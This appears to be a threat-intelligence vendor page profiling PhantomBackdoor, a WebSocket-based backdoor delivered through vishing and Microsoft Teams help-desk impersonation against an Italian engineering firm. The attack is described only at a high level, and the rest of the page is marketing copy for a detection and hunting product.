PhantomBackdoor
PhantomBackdoor is a backdoor/trojan observed in a social-engineering-driven intrusion campaign reported by Cato CTRL Threat Research. In the described activity, attackers used voice phishing and Microsoft Teams as part of the delivery chain, including help desk impersonation, to guide victims into executing PhantomBackdoor. One report specifically describes it as a WebSocket-based trojan delivered via an obfuscated PowerShell script retrieved from an external server. The campaign was identified against an Italy-based engineering firm. The available content directly associates PhantomBackdoor with vishing- and Teams-enabled initial access and remote backdoor functionality, but does not provide further confirmed technical details, persistence mechanisms, or indicators of compromise.
Hunt this family in your stack
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
Techniques & procedures
5 distinct techniques documented for this family, organized by ATT&CK tactic.
Recent activity
2 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
A WebSocket-based trojan/backdoor delivered through a Microsoft Teams help-desk impersonation campaign, executed via an obfuscated PowerShell script retrieved from an external server.
A backdoor delivered via a vishing technique and Microsoft Teams in an attack against an Italy-based engineering firm.
The version that knows your environment.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.